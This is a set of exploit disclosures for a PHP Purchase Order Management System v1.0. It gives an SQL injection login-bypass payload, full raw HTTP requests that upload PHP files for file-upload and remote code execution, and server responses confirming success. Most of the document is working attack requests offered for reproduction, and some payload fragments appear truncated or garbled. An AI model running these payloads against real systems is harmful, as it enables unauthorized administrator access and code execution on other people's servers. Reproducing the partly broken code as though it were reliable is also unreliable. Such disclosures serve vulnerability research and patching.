## Titles: POMS-PHP-(by oretnom23 )-v1.0-FU-SQLi-RCE-HAT.TRICK 1. SQLi Bypass Authentication 2. File Upload 3. RCE ## Latest update from the vendor: 5 hours 32 minutes ago ## Author: nu11secur1ty ## Date: 05/07/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection, https://portswigger.net/web-security/file-upload, https://portswigger.net/web-security/authentication ## Description: SQLi-Bypass-Authentication: The username parameter is not sanitizing well, the attacker can bypass authentication and login to the system. --------------------------------------------------------------------------------------------------------------------------------------- FU: Using this vulnerability, the attacker can upload any PHP file on the server. The parameter id="cimg" is not sanitizing securely. STATUS: CRITICAL- Vulnerability --------------------------------------------------------------------------------------------------------------------------------------- RCE: The attacker can upload a malicious file with hazardous content. Then he can use it to create another file on the server. STATUS: CRITICAL- Vulnerability [+]Exploits: - SQLi bypass authentication: ```mysql nu11secur1ty' or 1=1# ``` - FU: ``` ``` - SQLi - Bypass-Authentication: ``` Hello, you are hacked by Fileupload and RCE!'); fclose($fh); //unlink('test.html'); ?> ``` ## Reproduce: [href](https://www.patreon.com/posts/poms-php-by-v1-0-103786653) ## Proof and Exploit: [href]( https://www.nu11secur1ty.com/2024/05/poms-php-by-oretnom23-v10-fu-sqli-rce.html ) ## Time spent: 00:35:00 ## Titles: POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - SQLi Bypass Authentication ## Author: nu11secur1ty ## Date: 11/08/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#google_vignette ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `username` parameter is vulnerable to SQLi-bypass authentication. This will make it easy for malicious users to log in on this system, getting sensitive information, or even worse than ever, they can destroy it very easily! STATUS: HIGH- Vulnerability [+]Exploit: - SQLi: ```mysql POST /purchase_order/classes/Login.php?f=login HTTP/1.1 Host: pwnedhost.com Cookie: PHPSESSID=90lhc202cbb0s5adki1gd5suj0 Content-Length: 44 Sec-Ch-Ua-Platform: "Windows" Accept-Language: en-US,en;q=0.9 Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130" Sec-Ch-Ua-Mobile: ?0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://pwnedhost.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pwnedhost.com/purchase_order/admin/login.php Accept-Encoding: gzip, deflate, br Priority: u=1, i Connection: keep-alive username=nu11secur1ty' or 1=1#&password=sada ``` [+]Response: ``` HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 08:08:35 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 20 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 {"status":"success"} ``` ## Reproduce: [href](https://www.youtube.com/watch?v=wG60bjiFN7o) ## Demo PoC: [href]( https://www.nu11secur1ty.com/2024/11/poms-php-by-oretnom23-v10-copyright.html ) ## Time spent: 00:05:00 ## Titles: POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - File Upload Vulnerability exploit ## Author: nu11secur1ty ## Date: 11/08/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#google_vignette ## Reference: https://portswigger.net/web-security/file-upload ## Description: The `img` parameter is vulnerable to File Upload vulnerability. This will make it easy for malicious for the already login users to this system to getting sensitive information, or even worse than ever, they can destroy it very easily! STATUS: HIGH- Vulnerability [+]Exploit: ``` POST /purchase_order/classes/Users.php?f=save HTTP/1.1 Host: pwnedhost.com Cookie: PHPSESSID=90lhc202cbb0s5adki1gd5suj0 Content-Length: 709 Sec-Ch-Ua-Platform: "Windows" Accept-Language: en-US,en;q=0.9 Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130" Sec-Ch-Ua-Mobile: ?0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36 Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoIjZa6BqBYZRIp8V Origin: https://pwnedhost.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pwnedhost.com/purchase_order/admin/?page=user Accept-Encoding: gzip, deflate, br Priority: u=1, i Connection: keep-alive ------WebKitFormBoundaryoIjZa6BqBYZRIp8V Content-Disposition: form-data; name="id" 1 ------WebKitFormBoundaryoIjZa6BqBYZRIp8V Content-Disposition: form-data; name="firstname" Adminstrator ------WebKitFormBoundaryoIjZa6BqBYZRIp8V Content-Disposition: form-data; name="lastname" Admin ------WebKitFormBoundaryoIjZa6BqBYZRIp8V Content-Disposition: form-data; name="username" admin ------WebKitFormBoundaryoIjZa6BqBYZRIp8V Content-Disposition: form-data; name="password" ------WebKitFormBoundaryoIjZa6BqBYZRIp8V Content-Disposition: form-data; name="img"; filename="info.php" Content-Type: application/octet-stream ------WebKitFormBoundaryoIjZa6BqBYZRIp8V-- ``` [+]Response: ``` HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 08:52:20 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 1 ``` ## Reproduce: [href](https://www.youtube.com/watch?v=XODY8SSz62c) ## Demo PoC: [href]( https://www.nu11secur1ty.com/2024/11/poms-php-by-oretnom23-v10-copyright_8.html ) ## Time spent: 00:05:00 ## Titles: POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - Remote Code Execution Vulnerability exploit ## Author: nu11secur1ty ## Date: 11/08/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#google_vignette ## Reference: https://portswigger.net/web-security/file-upload ## Description: The `img` parameter is vulnerable to Remote Code Exception vulnerability - RCE. This will make it easy for malicious for the already login users to this system To get sensitive information, or even worse than ever, they can destroy it very easily by executing the already uploaded malicious file! In my case, I executed it directly from the remote browser, creating a malicious HTML file on the vulnerable server. This could be a web socket or any malicious code. It depends on the scenario! STATUS: HIGH- Vulnerability [+]Exploit: ``` POST /purchase_order/classes/Users.php?f=save HTTP/1.1 Host: pwnedhost.com Cookie: PHPSESSID=qkjnqf44841cts24ktnb7jr3dg Content-Length: 866 Sec-Ch-Ua-Platform: "Windows" Accept-Language: en-US,en;q=0.9 Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130" Sec-Ch-Ua-Mobile: ?0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36 Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1ICMb0SCiZtfFsS8 Origin: https://pwnedhost.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pwnedhost.com/purchase_order/admin/?page=user Accept-Encoding: gzip, deflate, br Priority: u=1, i Connection: keep-alive ------WebKitFormBoundary1ICMb0SCiZtfFsS8 Content-Disposition: form-data; name="id" 1 ------WebKitFormBoundary1ICMb0SCiZtfFsS8 Content-Disposition: form-data; name="firstname" Adminstrator ------WebKitFormBoundary1ICMb0SCiZtfFsS8 Content-Disposition: form-data; name="lastname" Admin ------WebKitFormBoundary1ICMb0SCiZtfFsS8 Content-Disposition: form-data; name="username" admin ------WebKitFormBoundary1ICMb0SCiZtfFsS8 Content-Disposition: form-data; name="password" ------WebKitFormBoundary1ICMb0SCiZtfFsS8 Content-Disposition: form-data; name="img"; filename="1nsi1deyou.php" Content-Type: application/octet-stream Hello, you are hacked by Fileupload and RCE!'); fclose($fh); //unlink('test.html'); ?> ------WebKitFormBoundary1ICMb0SCiZtfFsS8-- ``` [+]Response: ``` HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 09:15:18 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 1 ``` ## Reproduce: [href](https://youtu.be/7DHoO9EoZEM?si=sff7c22H_bfyLNad) ## Demo PoC: [href]( https://www.nu11secur1ty.com/2024/11/poms-php-by-oretnom23-v10-copyright_18.html ) ## Time spent: 00:05:00